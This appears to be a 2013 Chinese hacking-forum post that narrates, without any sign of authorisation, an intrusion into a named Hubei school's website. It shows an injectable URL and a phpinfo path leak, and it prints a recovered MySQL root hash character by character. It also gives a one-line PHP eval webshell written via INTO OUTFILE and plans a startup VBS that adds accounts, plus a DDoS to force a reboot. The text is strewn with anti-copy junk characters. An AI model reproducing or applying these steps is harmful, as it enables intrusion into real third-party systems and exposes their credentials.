找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3290|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ m  d+ n+ l" {; q
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
: u" Q9 }- p+ Z3 \* ?& e  B' C
9 ^9 c& k& S; ~
  T9 Z: H/ [6 M' _
1 z; ~% e3 E) N) M7 _. `6 t! Y# ]常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
0 h+ @) {& H. e# ?% D$ s* ^. e- {/ B1 `: @+ U5 z# S  \' t, }
那么想可以直接写入shell ,getshell有几个条件:- \& N; L% A2 M$ @
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
. K* g. t8 _) w- r7 @! S3 C/ P
试着爆绝对路径:. |/ y2 x( w3 z- {3 U6 H
1./phpMyAdmin/index.php?lang[]=1  / r# r5 G0 h( ~
2./phpMyAdmin/phpinfo.php  
9 Y1 A1 K* y3 n$ h4 G3./load_file()  
9 G# }; z* ?( N9 y1 |3 S. l% I4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
2 s" ~# I$ n& ~5./phpmyadmin/libraries/select_lang.lib.php  / k+ ~8 l; N7 d' R
6./phpmyadmin/libraries/lect_lang.lib.php  
, _  ]9 ^+ F; E' q7./phpmyadmin/libraries/mcrypt.lib.php   ) {( j' L+ o( Q2 z
8./phpmyadmin/libraries/export/xls.php  2 D  N* A$ _* |2 v

$ ~+ D# @. d* H; S; a均不行............................ p$ J" r% w, G1 o$ N6 V
0 E7 H; [& \, z+ B
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
5 d* `1 l7 g- m2 A7 B
% }6 i# N6 y% {. `9 Z权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin " }% i2 F: a: T

! e/ F( E. j& A, J: e, a默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败" p: ~" x' `( ?, Z

2 T" K$ L/ X6 U) A! ]敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
" a  Q, P# P7 @7 t' D3 [2 h4 }5 |: K: g/ l- h/ Q0 q3 }5 Z
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell   H+ L/ g. x7 u/ ^. V: }
. d& P0 L' j! z! C" I3 K
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini 3 a* z% T$ C- H: P7 j& I) b
1 g. w8 L6 |% m' v& l
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
+ u+ M# m: y/ w  j' @4 W  P
' f  X% d. @% ]3 \7 d' I; k成功读到root密码:
1 \2 x2 v2 ?; t# p
) q8 E7 m: Z5 e4 Y17---- r(0072)! h1 ~: e* n) b3 b# h
18---- o(006f)
5 _# g& r# L  T" V+ Y- C19---- o(006f): ~, D( M" n" [8 g
20---- t(0074). r9 M9 v# v! ], e3 `) H
21---- *(002a)7 f2 w; n6 S0 B% M: m
22---- 8(0038)! |8 o# V& O6 \' B# T, b( r9 ]; H
23---- 2(0032)
  k5 `( P7 v# Q. f' ]24---- E(0045)/ [) e1 Z# `% W+ o# q% d
25---- 1(0031)
0 @! R) ]; b6 ]3 k26---- C(0043)7 c* Y' J6 l( Z6 c
27---- 5(0035)" k5 |* V! Q  W$ S6 l4 w& O
28---- 8(0038); }% S# `4 J7 V1 R
29---- 2(0032)
% e9 p$ }: w) r* |! ~" _30---- 8(0038)
  D& {/ B+ o2 t" C7 ?+ ~31---- A(0041)) Q3 L& F! T7 P: Q% y
32---- 9(0039)- o# ~8 M5 V6 q( }$ {5 I4 K
33---- B(0042)4 i1 C% m3 i4 w. v3 C; m9 D
34---- 5(0035)
9 n6 \+ @* [6 l/ k$ c! J35---- 4(0034)
  r2 W$ T* Y# c7 a* p: A- b* M36---- 8(0038)
. J5 W1 S' W+ E9 @37---- 6(0036)6 u, Z! f) s! K$ r
38---- 4(0034)
* u# s; m% U# P: G4 I5 o* _39---- 9(0039)2 I  A0 x3 [3 l1 Q0 e( c( ], O
40---- 1(0031)
7 @& }3 P) h8 T$ J- v/ d41---- 1(0031)% M7 m# s) p% _" `$ @) d
42---- 5(0035)2 ], c2 v' x  z* j4 ~
43---- 3(0033)
# B8 ?4 t  U7 A6 p8 l44---- 5(0035)  U5 p" p2 y" ^2 W# @8 H
45---- 9(0039)
: H* h# U/ |5 j  U46---- 8(0038)
* A) l0 Y- w. Z' \: A47---- F(0046)
( _$ G( {( [4 w# w9 q/ S48---- F(0046)- ~- C, V3 F9 J+ S+ N
49---- 4(0034)
& f) \) z- u0 E/ ~- e4 l50---- F(0046)
' P  T) J( ]5 x/ \7 q51---- 0(0030)
& X# L) [& ?" S; l7 u  m52---- 3(0033)
) k$ A1 r3 D9 O) b1 S53---- 2(0032)3 @# H% l& G& b7 L( ?- R% C0 v) n
54---- A(0041)% X: M3 d; @" P8 G2 Q4 e
55---- 4(0034)7 W2 A* R. x4 _
56---- A(0041)
% E* w7 V/ C3 {( I- v( T57---- B(0042)
$ T8 x$ [1 F& T3 F7 a58---- *(0044)
/ |. O' J2 p; j5 x0 a59---- *(0035)
& f: B4 t) G3 j4 G60---- *(0041)- i, `+ U. ]. ]# r
61---- *0032)* g; H/ J& l( V" T* V( \- T, Q! ?

) S& {4 _4 e+ L9 O8 B0 d解密后成功登陆phpmyamin
* F. d9 Q; E! O                          
* ?- a3 H$ F" g. N6 Q) x; B4 @1 b! L5 X+ r- N3 V
                             
2 C' o+ Q) L  l$ }7 T* S
0 m: z6 Q" u; j3 R) j找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'# @9 B4 R5 ~) c- E4 F" k

: b& _8 D$ |8 V# O: Y- u成功执行,拿下shell,菜刀连接:. p. v7 o; S) q
  b5 m& k$ }& z3 R0 H& a" M
服务器不支持asp,aspx,php提权无果...................
. K- R* _) C3 Z7 y, L' n3 \$ h- M
, c: u- u3 W* Y5 k但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
+ t5 o! g3 ?/ d0 @4 D
服务器上已经有个隐藏帐号了

/ K& S( ]! s& a0 j; K: A% ]
别名     administrators
3 ]( t( u0 Q+ J1 o7 n2 g. A注释     管理员对计算机/域有不受限制的完全访问权
7 P4 ~5 w. ?3 v# A) f: Q
成员

& G5 R; o+ o* |' {0 W- P0 e
-------------------------------------------------------------------------------
: R3 C; m$ t. T9 s) Jadmin' z% D* V5 p  A, Y6 q: e! x  d. D( C
Administrator  B- o) K# Q  k3 u' ]
slipper$3 }7 t' L% b, u  v0 I
sqluser
# A- Y8 d4 f/ f; i2 i. x命令成功完成。
$ X- @7 z( T- ~) I2 ?
' m3 `9 g" X: Y2 ~" O1 S服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。- n5 N7 `$ `/ Z% `/ D: @

5 i3 |4 a! H; j; b. E; ]! Qddos服务器重启,不然就只能坐等服务器重启了...............................( z  E- E1 o8 M! A0 K
8 H; @* H7 g6 v" I: z( v* S& v
      

8 v7 n* E* U. Q% y* Y5 m

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表